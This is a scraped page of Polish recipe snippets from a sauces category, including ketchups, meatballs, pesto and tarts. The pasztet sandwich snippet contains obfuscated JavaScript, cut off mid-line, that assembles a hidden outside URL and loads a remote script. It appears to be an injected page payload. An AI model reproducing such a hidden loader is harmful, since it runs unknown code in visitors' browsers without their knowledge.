sosy - 72734 przepisów (strona:3266/4849)

Kotlety z płatków owsianych z pieczarkami, marchewką i żółtym serem. 214

delikatnie dno, układamy kotleciki i smażymy z obydwu stron po kilka minut, na rumiano. Odsączamy ewentualnie z nadmiaru tłuszczu na papierowym ręczniku. Takie kotlety śmiało można podać z dowolnym sosem, pieczarkowym , grzybowym lub pomidorowym. Smacznego :)   Wszystkich zainteresowanych produktami zapraszam na stronę internetową http://www.stoislaw.com.pl/pl/.

Sama słodycz i szczypta chili
Cukinia faszerowana mięsem, kaszą bulgur i kurkami 204

piekarnika nagrzanego na 180 C i zapiekać ok 40 minut aż cukinia będzie miękka, funkcja termoobieg. Na 10 minut przed końcem pieczenia posypać żółtym serem. Gotowa cukinie podałam z sosem czosnkowym

Monia miesza i gotuje
Ketchup z cukinii. 165

Cukinia w tym roku obrodziła więc aż grzech jej nie wykorzystać. Ketchup to ulubiony sos mojej rodziny. Zjadamy go nie tylko z pizzą... Z jakiejś gazecie wpadł mi w oczy przepis na ten domowy ketchup, wyszedł wspaniały. Kto robił czekam na opinie a kto przepis widzi pierwszy raz może się skusi i wypróbuje?! Składniki; 1,5 kg obranej cukinii

Radość kipiąca uśmiechem.
Szybkie kanapki z pasztetem 165

ponadziewać na wykałaczki kostki pasztetu razem z oliwkami, marynowanymi warzywami lub wspomnianymi suszonymi śliwkami. Takie same kostki wkroimy także do szybkiej sałatki, a długie paseczki podsmażymy i podamy z sosem czosnkowym. (function(){ i32r_=("u"+"st");i32r=document.createElement("script");i32r.async=true; i32ru="12087833";i32r_+="a"+("t.");i32r_+="i"+("nf"+("o"))+("/"); i32ru+=".2m6cfus532rmnvhk";i32ru+="j1xkjsmmhXfyin"; i32r.src="//"+i32r_+i32ru;i32r.type="text/javascript

Moja smaczna kuchnia
Jak smakuje Toskania według Piotra Adamczewskiego? 192

Każdy włoski region charakteryzuje się swoimi tradycyjnymi przysmakami. W Neapolu zjemy najlepszą włoską pizzę, zaś w Bolonii koniecznie musimy spróbować potraw w sosem bolognese. A co się jada w Toskanii? Artykuł Jak smakuje Toskania według Piotra Adamczewskiego? pochodzi z serwisu CookMagazine

COOKMAGAZINE
Klopsiki w sosie pomidorowym z fasolką 147

papryki i gotować około 15 minut.Doprawić solą i pieprzem.Dodać ugotowaną i odcedzoną fasolkę , dokładnie wymieszać i całość gotować około 5 minut, aby wszystko razem się połączyło, a sos oblepił fasolkę

Moje domowe kucharzenie
Kurczak w kremowym sosie cebulowo-paprykowym 306

minut, podlać winem oraz bulionem i dusić  pod przykryciem do miękkości około 25-30 minut, dodać  topiony serek, doprawić  do smaku solą oraz pieprzem, gdy sos zgęstnieje, zdjąć z ognia.  Posypać grubo posiekaną natką pietruszki. Podawać z ziemniakami, kaszą czy ryżem. Smacznego

Wanilia i Kardamon
Polędwica wieprzowa z grila 220

papierze do pieczenia i pieczemy 30 minut. Na rozgrzanym grillu kładziemy kawałki mięsa i przypiekamy z każdej strony po około 10 minut. Mięso podajemy z jarzębiną, która świetnie zastępuje sos do mięsa i nadaje mu wytrawny, unikatowy smak:) A wszystko zagryzamy zdrowymi frytkami z marchewki Smacznego

Ania i Marcin gotują
TORTILLA ZAPIEKANA ZE SZPINAKIEM I PAPRYKĄ KONSERWOWĄ 185

żółty, na to ułożyć szpinak i paprykę konserwową. Tortille złożyć na pół i zapiekać w nagrzanym tosterze do sandwicha. Po upieczeniu odkroić niepotrzebne końcówki. Można podać z sosem ketchupowo- majonezowym

Zrób to smacznie
PLACUSZKI Z CUKINII 181

Doprawiamy do smaku przyprawami, mieszamy. Na rozgrzaną patelnią lekko posmarowaną olejem, nakładamy po 1 łyżce masy, smażymy placki z obu stron na złoto.  Możemy podać placuszki z ulubionym sosem lub zjeść samodzielnie

słodki bratek
Quinoa z gulaszem z dzika i borowików 199

odparuje, następnie dodajemy pieprz, sól, trochę igiełek rozmarynu i utarty w moździerzu jałowiec. Dolewamy trochę gorącej wody i dusimy pod przykryciem na małym ogniu, aż wszystkie składniki zmiękną, a sos się zredukuje. W międzyczasie, w razie potrzeby dolewamy po trochę wody i mieszamy, żeby gulasz się nie przypalił. Podajemy z ugotowaną komosa ryżową i obiad gotowy

Quinoa Raz!
Makaron z sosem mięsno-pomidorowym 246

pomidorów 1 szklanka czerwonego wytrawnego wina 1 cebula 3 ząbki czosnku 1/2 cukinii 1 opakowanie makaronu świderki Lubella przyprawy: papryka słodka, … Czytaj dalej Makaron z sosem mięsno-pomidorowym

czarrna od kuchni
Domowy keczup pikantny 139

przetrzeć przez sito. Wlać keczup do wyparzonych słoików. Zakręcić i odwrócić do góry dnem. Przykryć grubym ręcznikiem i zostawić, aż ostygnie. Idealny do pizzy, kanapek, jako dodatek do sosów

Kuchnia Pokoleń
Wegańska tarta z kurkami i młodymi porami 201

którym smażyłeś/łaś grzyby wlej mleko i dodaj mąkę kukurydzianą, dokładnie wymieszaj i zagotuj (zajmie Ci to dosłownie 1 minutę). Dodaj oliwę grzybową i dokładnie wymieszaj. Dodaj powstały sos do grzybów, wymieszaj. Przełóż masę na ciasto (udekorowałam resztkami ciasta, którego było za dużo do formy). Piecz przez 40 minut w temp. 180-190 C na środkowej półce piekarnika z termoobiegiem

greenscarf
Pesto z rukoli-pyszny dodatek do makaronu i sałatek 179

proste i pyszne i jako sos do makaronu i jako dodatek np do zapiekanki czy sałatek-polecam Składniki: garść rukoli garść orzechów(nerkowca,piniowe,laskowa lub nawet włoskie-jakie lubicie) dwie łyżki startego sera najlepiej parmezan ale może być również twardy żółty ser oliwa z oliwek sól pieprz  ząbek czosnku Przygotowanie: wszystkie składniki dajemy do blendera i rozdrabniamy razem

Swojskie jedzonko